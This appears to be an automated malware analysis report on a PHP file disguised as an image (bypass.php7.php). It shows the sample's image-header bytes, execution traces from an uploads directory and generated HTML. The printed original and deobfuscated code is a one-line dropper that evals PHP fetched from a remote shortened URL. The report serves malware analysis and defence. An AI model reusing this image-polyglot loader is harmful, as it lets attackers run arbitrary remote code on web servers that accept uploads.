PHP Malware Analysis

bypass.php7.php

md5: 8f39d0918f7a1cc34c760ace89dc9a74

Jump to:

Screenshot


Attributes

Execution

Files

URLs


Deobfuscated PHP code

���JFIF��;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90
��C




��C		

��PP"��	
���}!1AQa"q2���#B��R��$3br�	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������	
���w!1AQaq"2�B����	#3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�����������������������������������������������������������������������?�"�E�x�}�^�L2[G����'�-�v��EIƜy�Tc�rO��-okZڳG�=_�Z�$�i=���7���m#,1����ר�B�Z~1^t�2:}�O�)��9�\+o6�a���B�u��W�ףNq�c�Q�
(������R�@{��K
�H�uQTW���W{5{�����]���ݮ_�7�[��+��+^D���}�FS^^�}�X�m���@�W��23+.�_�j��}����QEw��)�R��KY��u���[����"u�5a�)�_>W�|;�E�"��n�6�ʼn���oI�eQ^y�E+�Q�1�����ڮ����3W��D�E��%M�=��:�:�0�y�j�(���0�G����@��_�m'��҆>_�e?�ܻ�j���h��D/�sp�۟�m��.Zf����𥢊��*4��VjX�f��Q��ͻ�e�+�^��F[�ܤeͻܿ{o�W�W�BW�c���?�4�WI��m溑c�6�F���j��ڕ��.�Y'�_3�5��F�c�ۈl���l|��>�Ҽ��d��4���_iz.�>���3WB8�"��\��#p��)��絯iz��"��?+WEI�MI��ɵo�ڕ�f�)z����\���Z���E"��e���7AY���c�[�����1�/ѫ��}��T����GIF89a=<!DOCTYPE html>
<?php 
echo eval("?>" . file_get_contents("http://bit.ly/cokoxoxo"));
?>


Execution traces

data/traces/8f39d0918f7a1cc34c760ace89dc9a74_trace-1676257226.0909.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:00:51.988749]
1	0	1	0.000145	393576
1	3	0	0.000196	395280	{main}	1		/var/www/html/uploads/bypass.php7.php	0	0
2	4	0	0.000214	395280	file_get_contents	0		/var/www/html/uploads/bypass.php7.php	16	1	'http://bit.ly/cokoxoxo'
2	4	1	0.194074	399144
2	4	R			FALSE
2	5	0	0.194173	399520	eval	1	'?>'	/var/www/html/uploads/bypass.php7.php	16	0
2	5	1	0.194190	399520
2	5	R			NULL
1	3	1	0.194231	399232
			0.194267	318008
TRACE END   [2023-02-13 01:00:52.182902]


Generated HTML code

<html><head></head><body>����JFIF��;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90
��C




��C		

��PP"��	
���}!1AQa"q2���#B��R��$3br�	
%&amp;'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������	
���w!1AQaq"2�B����	#3R�br�
$4�%�&amp;'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������?�"�E�x�}�^�L2[G����'�-�v��EIƜy�Tc�rO��-okZڳG�=_�Z�$�i=���7���m#,1����ר�B�Z~1^t�2:}�O�)��9�\+o6�a����B�u��W�ףNq�c�Q�
(������R�@{��K
�H�uQTW����W{5{�����]���ݮ_�7�[��+��+^D���}�FS^^�}�X�m���@�W��23+.�_�j��}����QEw��)�R��KY��u����[����"u�5a�)�_&gt;W�|;�E�"��n�6�ʼn���oI�eQ^y�E+�Q�1������ڮ�����3W��D�E��%M�=��:�:�0��y�j�(���0�G����@��_�m'��҆&gt;_��e?�ܻ�j����h��D/�sp�۟�m��.Zf����𥢊���*4��VjX�f��Q��ͻ�e�+�^��F[�ܤeͻܿ{o�W�W�BW�c���?�4�WI��m溑c�6�F���j��ڕ��.�Y'�_3�5��F�c�ۈl���l|���&gt;�Ҽ��d��4���_iz.�&gt;���3WB8�"��\��#p��)��絯iz��"��?+WEI�MI��ɵo�ڕ�f�)z�����\���Z���E"��e���7AY���c�[�����1�/ѫ��}��T����GIF89a=

</body></html>

Original PHP code

���JFIF��;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90
��C




��C		

��PP"��	
���}!1AQa"q2���#B��R��$3br�	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������	
���w!1AQaq"2�B����	#3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�����������������������������������������������������������������������?�"�E�x�}�^�L2[G����'�-�v��EIƜy�Tc�rO��-okZڳG�=_�Z�$�i=���7���m#,1����ר�B�Z~1^t�2:}�O�)��9�\+o6�a���B�u��W�ףNq�c�Q�
(������R�@{��K
�H�uQTW���W{5{�����]���ݮ_�7�[��+��+^D���}�FS^^�}�X�m���@�W��23+.�_�j��}����QEw��)�R��KY��u���[����"u�5a�)�_>W�|;�E�"��n�6�ʼn���oI�eQ^y�E+�Q�1�����ڮ����3W��D�E��%M�=��:�:�0�y�j�(���0�G����@��_�m'��҆>_�e?�ܻ�j���h��D/�sp�۟�m��.Zf����𥢊��*4��VjX�f��Q��ͻ�e�+�^��F[�ܤeͻܿ{o�W�W�BW�c���?�4�WI��m溑c�6�F���j��ڕ��.�Y'�_3�5��F�c�ۈl���l|��>�Ҽ��d��4���_iz.�>���3WB8�"��\��#p��)��絯iz��"��?+WEI�MI��ɵo�ڕ�f�)z����\���Z���E"��e���7AY���c�[�����1�/ѫ��}��T����GIF89a=<!DOCTYPE html>
<?=eval("?>".file_get_contents("http://bit.ly/cokoxoxo"));?>